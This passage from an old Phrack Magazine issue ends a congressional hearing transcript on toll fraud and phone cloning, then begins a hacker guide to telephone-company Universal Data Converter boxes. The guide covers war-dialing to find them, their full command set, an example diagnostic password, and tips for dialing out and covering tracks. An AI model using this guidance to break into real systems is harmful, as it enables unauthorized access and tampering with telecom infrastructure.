  14189. even worse, and I think it is much more likely that things may be
  14190. fixed, the cellular industry may finally get its act together and
  14191. start protecting phone calls. The phone companies might make red
  14192. boxes harder to use or might make it easier for people to afford
  14193. phone calls, but we will never know if we don't make it public.
  14194.      Mr. FIELDS. I want to be honest with you, Mr. Goldstein. I
  14195. think it is frightening that someone like you thinks there is a
  14196. protected right in invading someone else's privacy.
  14197.      Mr. Guidry, let me turn to you. How does a hacker get the
  14198. codes that you were talking about a moment ago -- if I understood
  14199. what you were saying correctly, the manual ID number, the other
  14200. cellular numbers that allow them to clone?
  14201.      Mr. GUIDRY. Well, unfortunately, "2600" would be a real good
  14202. bet to get those, and we have arrested people and found those
  14203. manuals in their possession.
  14204.      The other way is quite simply just to what we call dumpster
  14205. dive, and that is to go to cellular carriers where they may destroy
  14206. trash. Unfortunately, some of it is shredded and put back together,
  14207. some of it is not shredded, and kids, criminals, go into those
  14208. dumpsters, withdraw that information, piece it together, and then
  14209. experiment with it. That information then is usually sold for
  14210. criminal activity to avoid prosecution.
  14211.      Mr. FIELDS. You are asking the subcommittee to include
  14212. wireless and cellular, and I think that is a good recommendation.
  14213. I think certainly that is one that we are going to take as good
  14214. counsel. But it appears that much of what you are talking about is
  14215. organized activity, and my question is, does the current punishment
  14216. scheme actually fit the crime, or should we also look at increasing
  14217. punishment for this type of crime?
  14218.      Mr. GUIDRY. I would strongly suggest that we increase the
  14219. punishment for this sort of crime. It is unfortunate that some
  14220. hackers take that information and sell it for criminal activity,
  14221. and, as a result, if prosecution is not stiff enough, then it far
  14222. outweighs the crime.
  14223.      Mr. FIELDS. What is the punishment now for this type of
  14224. cellular fraud?
  14225.      Mr. GUIDRY. Right now, it can be as high as $100,000 and up to
  14226. 20 years in the penitentiary.
  14227.      Mr. FIELDS. Mr. Delaney, do you feel that that is adequate?
  14228.      Mr. DELANEY. Under New York State law, which is what I deal
  14229. with, as opposed to the Federal law, we can charge a host of
  14230. felonies with regard to one illicit telephone call if you want to
  14231. be creative with the law. Sections 1029 and 1039 really cover just
  14232. about everything other than the cellular concern and the wireless
  14233. concern.
  14234.      However, I think the thing that is not dealt with is the
  14235. person who is running the call sell operations. The call selling
  14236. operations are the biggest loss of revenue to the telephone
  14237. companies, cellular companies. Whether they are using PBX's or call
  14238. diverters or cellular phones, this is where all the fraud is coming
  14239. from, and there is only a handful of people who are originating
  14240. this crime.
  14241.      We have targeted these people in New York City right now, and
  14242. the same thing is being done in Los Angeles and Florida, to
  14243. determine who these people are that use just the telephone to hack
  14244. out the codes on PBX's, use ESN readers made by the Curtis Company
  14245. to steal the ESN and MIN's out of the air and then to disseminate
  14246. this to the street phones and to the cellular phones that are in
  14247. cars and deprive the cellular industry of about $300 million a
  14248. year, and the rest of the telecommunications networks in the United
  14249. States probably of about $1 billion a year, due to the call sell
  14250. operations.
  14251.      In one particular case that we watched, as a code was hacked
  14252. out on a PBX in a company in Massachusetts, the code was
  14253. disseminated to 250 street phones within the period of a week. By
  14254. the end of the month, a rather small bill of $40,000 was sent to
  14255. the company, small only because they were limited by the number of
  14256. telephone lines going through that company. Had it been a larger
  14257. company whose code had been cracked by the finger hacker, the bill
  14258. would have been in the hundreds of thousands of dollars, or over $1
  14259. million as typically some of the bills have been.
  14260.      But this is a relatively small group of people creating a
  14261. tremendous problem in the United States, and a law specifically
  14262. dealing with a person who is operating as an entrepreneur, running
  14263. a call selling operation, I think would go far to ending one of the
  14264. biggest problems we have.
  14265.      Mr. FIELDS. Let me ask so I understand, Mr. Delaney and Mr.
  14266. Guidry, because I am a little confused, or maybe I just didn't
  14267. understand the testimony, are these individual hackers acting
  14268. separately, or are these people operating within a network, within
  14269. an organization?
  14270.      Mr. DELANEY. These finger hackers are the people that control
  14271. the network of people that operate telephone booths and cellular
  14272. phones for reselling telephone service. These finger hackers are
  14273. not computer hackers.
  14274.      Mr. FIELDS. When you say finger hackers, is this one person
  14275. operating independently, or is that finger hacker operating in
  14276. concert --
  14277.      Mr. GUIDRY. No. He has franchised. He has franchised out. He
  14278. actually sells the computer and the software and the cattail to do
  14279. this to other people, and then they start their own little group.
  14280. Now it is going internationally.
  14281.      Mr. FIELDS. Explain to me, if the chairman would permit --
  14282.      Mr. MARKEY. Please.
  14283.      Mr. FIELDS. Explain to me the franchise.
  14284.      Mr. GUIDRY. What happens is, let's pretend we are in Los
  14285. Angeles right now and I have the ability to clone a phone that is
  14286. using a computer, a cattail, we call it, that goes from the
  14287. computer, the back of the computer, into the telephone, and I have
  14288. the diskette that tells me how to change that program. I can at
  14289. some point sell the cloning. You can come to me, and I can clone
  14290. your phone.
  14291.      However, that is one way for me to make money. The best way
  14292. for me to make money is to buy computers, additional diskettes, and
  14293. go to Radio Shack or some place and make additional cattails and
  14294. say, "I can either clone your phone for $1,500, or what you can do
  14295. for $5,000 is start your own company." So you say, "Well, wow,
  14296. that's pretty good, because how many times would I have to sell one
  14297. phone at from $500 to $1,500 to get my initial investment back?" As
  14298. a result now, you have groups, you have just youngsters as well as
  14299. organized crime stepping in.
  14300.      The Guidry Group has worked in the Philippines on this, we
  14301. have worked in Mexico, the Dominican Republic, Chile, Argentina,
  14302. and next week I will be in London and in Rome. It is so bad, sir,
  14303. that now intelligence agencies in Rome have told me -- and that is
  14304. what I am going there for -- that organized crime seems to think
  14305. that telecommunications fraud is more lucrative, unfortunately,
  14306. than drugs, and it is darned sure more lucrative in the Los
  14307. Angeles, probably New York, and Miami areas, because right now
  14308. prosecution is not that strong. It is unfortunate that all of law
  14309. enforcement is not trained, nor could they be, to pick up on
  14310. someone standing on a corner using an illegitimate phone.
  14311.      Mr. FIELDS. How would a person know where to get their
  14312. telephone cloned?
  14313.      Mr. GUIDRY. Let me tell you what happens. Normally when we go
  14314. into a major metropolitan city, or we also check the computer
  14315. bulletin boards, a lot of times that information is there. Most of
  14316. the time, though, it is in magazines, like green sheets, which are
  14317. free advertisements saying, "Call anywhere in the world. Come to --"
  14318. a location, or, "Call this number." Also in Los Angeles, for some
  14319. reason, they seem to advertise a lot in sex magazines, and people
  14320. will simply buy a sex magazine and there will be a statement in
  14321. there, "Earn money the fast way. Start your own telecommunications
  14322. company." And then we will follow up on that tip and work with the
  14323. Secret Service to try to apprehend those people.
  14324.      Mr. FIELDS. Mr. Haugh.
  14325.      Mr. HAUGH. If I could just add a few comments, it would be
  14326. most unfortunate if this denigrates into a discussion of
  14327. adolescents who are curious and so-called finger hackers. The truth
  14328. of the matter is that the toll fraudsters are adults, they are
  14329. organized, they are smart, they are savvy, and the drug dealers in
  14330. particular are learning very quickly that it is far more lucrative,
  14331. far less dangerous, to go into the telecom crime business.
  14332.      "Finger hacking" is a term, but the truth is, war dialers,
  14333. speed dialers, modems, automated equipment now will hack and crack
  14334. into systems and break the codes overnight. While the criminal
  14335. sleeps, his equipment penetrates those systems. He gets up in the
  14336. morning, and he has got a print sheet of new numbers that his
  14337. equipment penetrated overnight.
  14338.      We have interviewed the criminals involved. These so-called
  14339. idle curiosity adolescents are being paid up to $10,000 a month for
  14340. new codes. I don't call that curiosity, I call that venality. We
  14341. are talking a $4 billion problem.
  14342.      The chairman came up with the Maple Street example. I think
  14343. even better yet, Mr. Chairman, the truth is that 216 Maple had a
  14344. security device on the door and a code, and what Mr. Goldstein and
  14345. his ilk do is sell that code through selling subscriptions to these
  14346. periodicals. There is a big difference, in my opinion, between
  14347. saying, "216 Maple is open" -- that is bad enough -- than to say,
  14348. "You go to 216 Maple, and push 4156, and you can get in the door."
  14349.      But we are talking about crime, we are talking about adults,
  14350. we are talking about organized crime, perhaps not in the Cosa
  14351. Nostra sense, but even the Cosa Nostra is wising up that they can
  14352. finance some of these operations, and in New York and Los Angeles,
  14353. in particular, the true Mafia is now beginning to finance some of
  14354. these telecom fraud operations.
  14355.      Mr. FIELDS. Mr. Guidry, one last question. Is it the Secret
  14356. Service that is at the forefront of Federal activity?
  14357.      Mr. GUIDRY. Yes, sir, it is.
  14358.      Mr. FIELDS. Do they have the resources to adequately deal with
  14359. this problem?
  14360.      Mr. GUIDRY. No, sir. The problem is growing so rapidly that
  14361. they are undermanned in this area but have asked for additional
  14362. manpower.
  14363.      Mr. FIELDS. Is this a priority for the Secret Service?
  14364.      Mr. GUIDRY. Yes, sir, it is.
  14365.      Mr. FIELDS. Thank you, Mr Chairman.
  14366.      Mr. MARKEY. The gentleman's time has expired.
  14367.      Again, it is a $4 to $5 billion problem.
  14368.      Mr. HAUGH. That is what our research indicated.
  14369.      Mr. MARKEY. There were 35,000 victims last year alone.
  14370.      Mr. HAUGH. Yes, sir, and this is only users, large users. Now
  14371. it can be businesses, nonprofits. There is a university on the East
  14372. Coast that just this last week got hit for $490,000, and the fraud
  14373. is continuing.
  14374.      Mr. MARKEY. The gentleman from Ohio.
  14375.      Mr. OXLEY. Thank you, Mr. Chairman.
  14376.      Let me ask the witnesses: Other than making the penalties
  14377. tougher for this type of activity, what other recommendations, if
  14378. any, would any of you have that we could deal with, that our
  14379. subcommittee should look at, and the Judiciary Committee, I assume,
  14380. for what we might want to try to accomplish?
  14381.      Mr. Haugh?
  14382.      Mr. HAUGH. I happen to disagree with a couple of the witnesses
  14383. who have indicated tougher penalties. I mean it sounds great. You
  14384. know, that is the common instant reaction to anything, expand the
  14385. penalties. I happen to think 20 years is plenty enough for criminal
  14386. penetration of a telecom system, and there are a few housekeeping
  14387. things that could be done.
  14388.      The problem isn't the adequacy of the law, the laws are pretty
  14389. adequate, and, as Mr. Delaney indicated, you have a violation
  14390. someplace, you have got a State law and a Federal law, both, and if
  14391. you are a smart prosecutor, there are about eight different ways
  14392. you can go after these criminals.
  14393.      The truth is, we have got inadequate enforcement, inadequate
  14394. funding, inadequate pressure on the part of the Congress on the FCC
  14395. to make more proactive efforts and to put more heat on the industry
  14396. to coordinate.
  14397.      The truth is that the carriers compete with each other
  14398. fiercely. They, with some limited exceptions, don't share
  14399. appropriate information with each other. The LEC's and the RBOC's
  14400. hide behind privacy; they hide behind other excuses not to
  14401. cooperate with law enforcement and with the rest of the industry as
  14402. effectively as they should.
  14403.      So I think putting the heat on the industry, putting the heat
  14404. on the FCC, more adequately funding the FCC, more adequately
  14405. funding the Secret Service, and having hearings like this that
  14406. focus on the problem is the answer and not expanding the penalty
  14407. from 20 years to 25 years. Nobody gets 20 years anyway, so
  14408. expanding the 20 years is, to me, not the answer.
  14409.      Mr. OXLEY. What is the average sentence for something like
  14410. that?
  14411.      Mr. HAUGH. I think the average toll fraud criminal who
  14412. actually goes to jail -- and they are few and far between -- spends
  14413. 3 to 6 months, and they are out.
  14414.      Now recidivism levels are low, I agree with Mr. Delaney. Once
  14415. you catch them, they rarely go back to it. So it isn't a question
  14416. of putting them in jail forever, it is a question of putting them
  14417. in jail. The certainty of punishment level is very low.
  14418.      We talked to a drug dealer in New York City who left the drug
  14419. business to go into toll fraud because he told me he can make
  14420. $900,000 a year -- nontaxable income, he called it -- and never
  14421. ever worry about going to jail.
  14422.      Mr. DELANEY. In New York City, I have never seen anybody go to
  14423. jail on a first offense for anything short of armed robbery, let
  14424. alone telephone fraud. They typically get 200 hours of community
  14425. service, depending upon the judge.
  14426.      These people that I am speaking about are not the computer
  14427. hackers that we were speaking about earlier, these are the people
  14428. that are the finger hackers that break into the PBX's around the
  14429. country. These are immigrants in the United States, they are
  14430. adults, they know how to operate a telephone. They sit there
  14431. generally -- almost every one that we have arrested so far uses a
  14432. Panasonic memory telephone, and they sit there night and day try
  14433. ing to hack out the PBX codes. They go through all the default
  14434. codes of the major manufacturers of PBX's. They know that much.
  14435.      We don't have a single person in New York City, that I know
  14436. of, that is hacking PBX's with a computer. The long distance
  14437. carriers can see patterns of hacking into 800 lines, which are
  14438. typically the PBX's, and they can see that it is being done by
  14439. telephone, by finger hacking a telephone key pad, as opposed to a
  14440. computer.
  14441.      The war dialing programs that Mr. Haugh referred to are
  14442. typically used by the computer hackers to get these codes, but they
  14443. create only a minuscule amount of the fraud that is ongoing in the
  14444. country. The great majority is generated by the finger hackers who
  14445. then disseminate those codes to the telephone booths and the call
  14446. selling operations that operate out of apartments in New York City.
  14447. In one apartment with five telephones in it that operates 16 hours
  14448. a day for 365 days a year selling telephone service at $10 for 20
  14449. minutes, you take in $985,000. It is a very profitable business.
  14450.      One of the individuals we arrested that said he did this
  14451. because it was more profitable and less likely that he be caught
  14452. than in selling drugs was murdered several months after we arrested
  14453. him in the Colombian section of Queens because he was operating as
  14454. an independent. It is a very controlled situation in New York City,
  14455. and different ethnicities throughout New York City control the call
  14456. sell operations in their neighborhoods, and everyone in those
  14457. neighborhoods knows where they can go to make an illicit phone call
  14458. or to get a phone cloned, whether it is a reprogrammed phone or
  14459. rechipped.
  14460.      Mr. OXLEY. Mr. Guidry, did you have a comment?
  14461.      Mr. GUIDRY. Well, I think that we really do need to enforce
  14462. the laws and we need to make some statutory changes in title 18,
  14463. section 1029 to include cellular and wireless.
  14464.      I have been in courtrooms where really savvy defense attorneys
  14465. say, "Well, it does not specifically indicate cellular or
  14466. wireless," and that raises some question in the jury's mind, and I
  14467. would just as soon that question not be there.
  14468.      Mr. OXLEY. Thank you.
  14469.      Mr. Chairman, I see we have got a vote, and I yield back the
  14470. balance of my time.
  14471.      Mr. MARKEY. Thank you.
  14472.      We are going to have each one of you make a very brief summary
  14473. statement to the committee if you could, and then we are going to
  14474. adjourn the hearing.
  14475.      As you know, the Federal Communications Commission will be
  14476. testifying before this subcommittee next week. We have a great
  14477. concern that, although they held an all-day hearing on toll fraud
  14478. last October, while we thought they were going to move ahead in an
  14479. expeditious fashion, that, with a lot of good information, it has
  14480. all sat on the shelf since that time. We expected them to act on
  14481. that information to establish new rules protecting consumers and
  14482. pushing carriers to do a lot more than they have done thus far to
  14483. protect their networks. In light of recent court decisions holding
  14484. that consumers are always liable I think that action by the FCC is
  14485. long overdue, and at the FCC authorization hearing next week I
  14486. expect to explore this issue with the commissioners in depth, so
  14487. you can be sure of that, Mr. Haugh.
  14488.      Let's give each of you a 1-minute summation. Again, we will go
  14489. in reverse order and begin with you, Mr. Guidry.
  14490.      Mr. GUIDRY. Thank you, sir.
  14491.      Telecommunications fraud, of course, is going internationally,
  14492. and as it goes internationally and starts to franchise and get more
  14493. organized, we are going to have to figure out a better way to
  14494. combat it. Industry itself right now is putting its best foot
  14495. forward. However, I would ask this committee to strongly look at
  14496. changing some of this legislation and to also increase law
  14497. enforcement's efforts through manpower.
  14498.      Thank you very much, sir.
  14499.      Mr. MARKEY. Thank you.
  14500.      Mr. Haugh.
  14501.      Mr. HAUGH. I agree with Mr. Guidry that there are some
  14502. housekeeping changes that need to be made, and the particular title
  14503. and section he referred to should definitely be amended to include
  14504. more clearly wireless.
  14505.      The overall problem is an immense one; it is a very serious
  14506. one; it is a complicated one. Everybody is at fault. Finger
  14507. pointing has been carried to an extreme. Again, I think the long
  14508. distance carriers, the big three -- AT&T, MCI, and Sprint -- have
  14509. done a superb job of coming up to speed with monitoring. They are
  14510. starting to cooperate better. They have really come to the table.
  14511.      The laggards are the LEC's and the RBOC's, the CPE
  14512. manufacturers, and the FCC. In fairness to the FCC, they are
  14513. understaffed, undermanned, underfunded. They can't even take care
  14514. of all their mandated responsibilities right now, let alone take on
  14515. new chores.
  14516.      All that said, there is a great deal the FCC can do --
  14517. jawboning, regulations, pushing the LEC's and the RBOC's, in
  14518. particular, to get real, get serious -- and I would urge this
  14519. committee -- applaud your efforts and urge you to continue that.
  14520.      Mr. MARKEY. Thank you.
  14521.      Dr. Tippett.
  14522.      Mr. TIPPETT. Thank you.
  14523.      The computer virus issue is a little bit different than the
  14524. toll fraud issue. In fact, there are no significant laws that deal
  14525. with viruses, and, in fact, the fact that there are no laws gives
  14526. the people who write viruses license to write them. The typical
  14527. statement you read is, "It's not illegal, and I don't do anything
  14528. that is illegal." So in the computer virus arena we do need laws.
  14529. They don't need to be fancy; they don't need to be extensive. There
  14530. are some suggestions of approaches to virus legislation in my
  14531. written testimony.
  14532.      We also need education, and I would encourage Congress to
  14533. underwrite some education efforts that the private sector could
  14534. perform in various ways, perhaps through tax incentives or tax
  14535. credits. The problem is growing and large. It exceeds $1 billion
  14536. already in the United States, and it is going to be a $2 billion
  14537. problem in 1994.
  14538.      As bad as toll fraud seems, this virus issue is, oddly, more
  14539. pervasive and less interesting to a whole lot of people, and I
  14540. think it needs some higher attention.
  14541.      Mr. MARKEY. Thank you.
  14542.      Mr. Goldstein.
  14543.      Mr. GOLDSTEIN. Thank you.
  14544.      I would like to close by cautioning the subcommittee and all
  14545. of us not to mix up these two very distinct worlds we are talking
  14546. about, the world of the criminal and the world of the experimenter,
  14547. the person that is seeking to learn. To do so will be to create a
  14548. society where people are afraid to experiment and try variations on
  14549. a theme because they might be committing some kind of a crime, and
  14550. at the same time further legislation could have the effect of not
  14551. really doing much for drug dealers and gangsters, who are doing far
  14552. more serious crimes than making free phone calls, and it is not
  14553. likely to intimidate them very much.
  14554.      I think the answer is for all of us to understand specifically
  14555. what the weaknesses in the technology are and to figure out ways to
  14556. keep it as strong and fortress-like as possible. I do think it is
  14557. possible with as much research as we can put into it.
  14558.      Thank you.
  14559.      Mr. MARKEY. Thank you, Mr. Goldstein.
  14560.      Mr. Delaney.
  14561.      Mr. DELANEY. Last year, the Secret Service and the FBI
  14562. arrested people in New York City for conducting illegal wiretaps.
  14563. The ability to still do that by a hacker exists in the United
  14564. States. Concerned with privacy, I am very happy to see that
  14565. something like the Clipper chip is going to become available to
  14566. protect society. I do hope, though, that we will always have for
  14567. the necessary law enforcement investigation the ability to conduct
  14568. those wiretaps. Without it, I see chaos.
  14569.      But with respect to the cellular losses, the industry is
  14570. coming along a very rapid rate with technology to save them money
  14571. in the future, because with encryption nobody will be able to steal
  14572. their signals either.
  14573.      Mr. MARKEY. Thank you, Mr. Delaney.
  14574.      I apologize. There is a roll call on the Floor, and I only
  14575. have 3 minutes to get over there to make it. You have all been very
  14576. helpful to us here today. It is a very tough balancing act, but we
  14577. are going to be moving aggressively in this area. And we are going
  14578. to need all of you to stay close to us so that we pass legislation
  14579. that makes sense.
  14580.      This hearing is adjourned. Thank you.
  14581.      [Whereupon, at 12:16 p.m., the subcommittee was adjourned.]
  14582.  
  14583.                               ==Phrack Magazine==
  14584.  
  14585.                  Volume Five, Issue Forty-Five, File 21 of 28
  14586.  
  14587. ****************************************************************************
  14588.  
  14589.                         The Universal Data Converter
  14590.                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14591.                            Written by:  Maldoror
  14592.                      ~~~ChUrcH oF ThE nOnConFOrMisT~~~
  14593.                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14594.                      -=[     DELAMO LABS INC       ]=-
  14595.                        """""""""""""""""""""""""""""
  14596.  
  14597. What IS a UDC?!
  14598. """""""""""""""
  14599.  
  14600. The Universal Data converter (UDC), by Applied Computing Devices,
  14601. was put into widespread use in 1979.  A UDC is used primarily in
  14602. connection with a variety of switches, to log everything the switch does,
  14603. and report it to the Central Office in a standard format, allowing the
  14604. monitoring and reporting of a variety of different switches by one processor
  14605. without the need of understanding each individual switch. This lets the
  14606. Telco-Trouble shooters monitor exactly how much traffic is passing
  14607. thru a given switch.  Exact number of calls, busys & fraud attempts, are
  14608. some examples.  A UDC will give detailed reports of such activity, as
  14609. well as hold it in a buffer file which you can view for your own excitement.
  14610. The real purpose of this piece of hardware is to buffer data, convert it
  14611. to a standard format, and send it on it's merry way to the Central Processor.
  14612. Information may be buffered for up to an hour, before being able to be
  14613. received by the Central Processor.
  14614.  
  14615. Which Switches use a UDC?
  14616. """""""""""""""""""""""""
  14617.  
  14618. Well, apparently, nearly all switches owned by a tel-co use a UDC
  14619. for their daily reports.  Here is a list of the switches of which I know
  14620. may be connected to a converter:
  14621.  
  14622.  
  14623.        At&t Autoplex 100
  14624.        ITT/North 1210
  14625.        ITT/North NX-1E
  14626.        ITT/North "1200" Series (DSS-1)
  14627.        GTE GTD-1 (Automatic Electric no. 1 EAX)
  14628.        GTE GTD-2 (Automatic Electric no. 2 EAX)
  14629.        GTE GTD-3 (Automatic Electric no. 3 EAX)
  14630.        GTE GTD-5
  14631.        Motorola EMX-250
  14632.        NEC NEAX-61
  14633.        NEC ND-20S
  14634.        Northern Telecom DMS-10
  14635.        Northern Telecom DMS-100
  14636.        Northern Telecom DMS-200
  14637.        Northern Telecom DMS-250
  14638.        Northern Telecom DMS-300
  14639.        Northern Telecom SL-1  (Seen these around locally)
  14640.        Northern Telecom SP-1 PABX
  14641.        Stromberg Carlson DCO
  14642.        TRW Vidar ITS-4
  14643.        TRW Vidar ITS-4/5
  14644.        TRW Vidar ITS-5
  14645.        Western Electric 5 ESS
  14646.        GTE PBX's (GTD-1000, GTD-4600)
  14647.  
  14648.  
  14649.  
  14650. General Configurations:
  14651. """""""""""""""""""""""
  14652.  
  14653. A UDC may be configured in several ways.  A UDC consists of up to 6 ports.
  14654. Port 0 is usually a dialin line, in which it is connected to a 300/1200
  14655. baud modem, so that GTE employees may call to check their switch
  14656. information in the field.
  14657.  
  14658. Port 0 may also be a dedicated line, which is linked to a computer somewhere
  14659. important, but if this is the case, you can't have found it anyways, so don't
  14660. worry about it. (Unless of course you another indial port possibly 1)
  14661.  
  14662. Port 2 is usually the line which is hardwired to the data output of the
  14663. switch.  This port receives the messages of a switch, analyses the data,
  14664. buffers it, and waits until it is told to send the data to the CP, which
  14665. may be every time the buffer flips, which of course is configured by hardware.
  14666. It is not required that port 2 be the hardwire, although it is just the
  14667. most common configuration.
  14668.  
  14669. Port 1 & 3-7 are also multi-use ports , which may be configured
  14670. either for a dedicated line, or a standard phone line, just like port 1.
  14671. The difference between this port and port 0 however, is that this port may
  14672. also be used to test lines other than the hardware set report line #.
  14673. (More later.)
  14674.  
  14675. NOTE:  ANY of these ports can be completely different depending on the
  14676.        setup of the UDC's cards, and which slot they are in...
  14677.  
  14678.  
  14679. The UDC can be configured (though I have never seen it this way) so that any
  14680. of the six ports can preform the functions instead of the first three.
  14681. If you find a UDC, be sure to check all the ports, and not just three.
  14682.  
  14683. The general idea of this box of tin is that it will monitor any
  14684. switch, collect data into a buffer, and store it until it need be
  14685. converted and polled by the SAC.  When the data is sent out, it is sent
  14686. in standard UDC format, regardless of the type of switch, therefore any
  14687. switch may be monitored by the SAC without having to be converted on
  14688. the spot.
  14689.  
  14690. Yeah Great what the ?#!$ do I do?
  14691. """"""""""""""""""""""""""""""""'
  14692.  
  14693. Scan your local area for all numbers ending in 99xx or 00xx, often
  14694. (with GTE anyways) the prefix may be something like 446-9988, or something
  14695. outright obvious.  Once you find one, you will know, because you will
  14696. get one of two things.  Depending on the configuration of the UDC,
  14697. you will either begin getting a dump of data, which will go into detail
  14698. about the switch information, or you will get a prompt:
  14699.  
  14700. *B*>
  14701.  
  14702. When you receive this prompt, you can make your life easy by typing
  14703. HELP in all caps, for a menu of commands, which will seem important at
  14704. first (don't fool yourself).
  14705.  
  14706. Each letter between *'s represents a separate processor (yes even this tin
  14707. box has more than one!  These letters will be in the menu
  14708. when you type HELP.  To change processors, you will need to hold control
  14709. while pressing the letter of the processor you wish to change to.
  14710.  
  14711. Here is a list of commands for each processor:
  14712.  
  14713.                         The Basic processor
  14714.                         ~~~~~~~~~~~~~~~~~~~
  14715.  
  14716. *B*> DATE               Display the system Date
  14717.  
  14718. *B*> DATE mm/dd/yy      Set the date to mm/dd/yy
  14719.  
  14720. *B*> DIAGNOSTIC         This puts you in debug mode for the UDC's program
  14721.                         When typing this command the UDC will respond with
  14722.                         "PASSWORD" and will not echo letters.  If the password
  14723.                         given is correct, you will get a prompt like this:
  14724.                         *B*> DIAG
  14725.                         PASSWORD 305      > I enter the good password<
  14726.                         DEBUG 1,3         > 1,3 are the ports in use <
  14727.                         ?
  14728.                         At this point you can reboot the UDC by typing:
  14729.                         ? G
  14730.                         (ADDR)=1000       > I tell it to jmp to 1000 <
  14731.                         Then all hell will break loose...trust me!
  14732.                         O.k. well it will look like it anyway...
  14733.  
  14734.  
  14735. *B*> HELP               Duh um, a Menu
  14736.  
  14737. *B*> RAMPAGE            Test traffic data storage area
  14738.  
  14739. *B*> SYSTEM             Display system checksums
  14740.  
  14741. *B*> TIME               Display system time
  14742.  
  14743. *B*> TIME hh:mm:ss      Set system time (confuse them, set it back then forwd)
  14744.  
  14745.  
  14746.                         The Patch Processor
  14747.                         ~~~~~~~~~~~~~~~~~~~
  14748.  
  14749. *P*> ANSWER n           Take channel 'n' off hook (neato)
  14750.  
  14751. *P*> BAUD c,bbbb,nnn    Set Channel 'c' Baud rate to 'bbbb', and
  14752.                         number of nulls to 'nnn'
  14753. *P*> HANGUP n           Put channel 'n' on hook (log out too)
  14754.  
  14755. *P*> HELP               Help Menus
  14756.  
  14757. *P*> PATCH n            Patch calling port to port 'n' (Dial out!)
  14758.                         It IS possible to patch to modem ports, but I don't
  14759.                         recommend it...all GTE numbers have their own COS.
  14760.                         (Easy to find you)
  14761.  
  14762.                         The Plant Queue Processor
  14763.                         ~~~~~~~~~~~~~~~~~~~~~~~~~
  14764.  
  14765. *Q*> ALARM              Display the alarm (error message) string
  14766.  
  14767. *Q*> ALARM xx..xxx      Set Alarm String (change it back if u want)
  14768.  
  14769. *Q*> CLEAR              Clear buffer without printing contents (not preferred)
  14770.  
  14771. *Q*> DUMP               Print and clear contents (destructive, not preferred)
  14772.  
  14773. *Q*> HELP               Help Menu
  14774.  
  14775. *Q*> LIMITS             Display buffer alarm threshold
  14776.  
  14777. *Q*> LIMITS nnnnn       Set buffer alarm threshold to 'nnnn'
  14778.  
  14779. *Q*> LIST               Display buffer contents (Better than dump)(ok!)
  14780.  
  14781. *Q*> LIST nnnn          Display buffer contents from 'nnnn' to end
  14782.  
  14783.  
  14784.                         The Report Processor
  14785.                         ~~~~~~~~~~~~~~~~~~~~
  14786.  
  14787. *R*> BACKUP             Transfer a copy of the ROM based table to the
  14788.                         editor workspace
  14789. *R*> DEFAULT            Make the ROM based table effective (can crash)
  14790.  
  14791. *R*> EDIT               Engage in edit mode
  14792.  
  14793.         APPEND          Add line to RMT (Hi there Gen-Tel!)
  14794.         DELETE          Delete line from RMT
  14795.         END             End edit session
  14796.         HELP            List Editor Commands
  14797.         LIST            List RMT
  14798.         MODIFY          Modify a line in RMT
  14799.  
  14800. *R*> DOWNLOAD           Download RMT to PROM programmer (ha!)
  14801.  
  14802. *R*> HELP               More menus
  14803.  
  14804. *R*> LIST               List effective RMT
  14805.  
  14806. *R*> LIST N             List RMT without Heading
  14807.  
  14808. *R*> LIST nnnn          List line 'nnnn' of effective RMT
  14809.  
  14810. *R*> LIST nnnnN         List line 'nnnn' of effective RMT without heading
  14811.  
  14812. *R*> LIST nnnn,mmmm     List lines 'nnnn' to 'mmmm' of RMT
  14813.  
  14814. *R*> LIST nnnn,mmmmN    List lines 'nnnn' to 'mmmm' of RMT without heaading
  14815.  
  14816. *R*> NEW                Clear the editor workspace
  14817.  
  14818. *R*> USER               Make RAM based RMT active
  14819.  
  14820.  
  14821.                         The Scanner Processor
  14822.                         ~~~~~~~~~~~~~~~~~~~~~
  14823.  
  14824. *S*> CIRCUIT             Display Status Report
  14825.  
  14826. *S*> CIRCUIT nnn OFF     Turn off circuit 'nnn' and print Status report
  14827.  
  14828. *S*> CIRCUIT nnn OFF N   Turn off circuit 'nnn' without report
  14829.  
  14830. *S*> CIRCUIT nnn,mmm OFF Turn off circuts 'nnn' to 'mmm'
  14831.  
  14832. *S*> CIRCUIT nnn,mmm OFF N  Turn off 'nnn' to 'mmm' without report
  14833.  
  14834. *S*> CIRCUIT nnn ON      Turn 'nnn' ON and print report
  14835.  
  14836. *S*> CIRCUIT nnn ON N    Turn 'nnn' ON without report
  14837.  
  14838. *S*> CIRCUIT nnn,mmm ON  Turn circuts 'nnn' to 'mmm' on and print status report
  14839.  
  14840. *S*> CIRCUIT nnn,mmm,ON N   Turn on 'nnn' to 'mmm' but do not print report
  14841.  
  14842. *S*> REPORT             Display names of disable reports
  14843.  
  14844. *S*> REPORT report.type OFF     Disable 'report.type' for printing
  14845.  
  14846. *S*> REPORT report.type ON      Enable  'report.type' for printing
  14847.  
  14848. *S*> RESTART            Restart scanner interrogation
  14849.  
  14850. *S*> ROUTE n            Display all future alarm reports on channel 'n'
  14851.  
  14852. *S*> STOP               Stop scanner interrogation
  14853.  
  14854. *S*> TEST               Dial the alarm number set on the system optioning
  14855.                         board (dip switches on the config board) for
  14856.                         communication line testing.
  14857.  
  14858. *S*> TEST 3,1 nnn nnn nnnn    Dial the indicated number (on port 3) and test
  14859.                               the communication lines.
  14860.                               If you test with the port you called in on,
  14861.                               you will have to hangup and call back for the
  14862.                               results. (Port 0)
  14863.  
  14864.                         The Traffic Processor
  14865.                         ~~~~~~~~~~~~~~~~~~~~~
  14866.  
  14867. *T*> ACTIVE             Display the contents of the active buffer
  14868.  
  14869. *T*> BANK               Display bank to be polled
  14870.  
  14871. *T*> BANK n             Set Bank to be polled (bank 'n')
  14872.  
  14873. *T*> FLIP               Flip the buffers (this MAY cause polling, depending
  14874.                         on the hardware (switch) & port configuration)
  14875. *T*> HELP               Processor Menus
  14876.  
  14877. *T*> METERS             Display current meter limits
  14878.  
  14879. *T*> METERS nnnn        Set upper meter limits
  14880.  
  14881. *T*> METERS mmmm,nnnn   Set lower and upper meter limits
  14882.  
  14883. *T*> METERS mmmm,nnnn V Set variable meter limits
  14884.  
  14885. *T*> METERS mmmm,nnnn F Set fixed meter limits
  14886.  
  14887. *T*> PASSIVE            Display the contents of a Passive buffer
  14888.  
  14889. *T*> TRAFFIC            Interrupt or resume traffic after user interaction
  14890.                         with channel 1
  14891.  
  14892.  
  14893.  
  14894. Standard Control Codes
  14895. ~~~~~~~~~~~~~~~~~~~~~
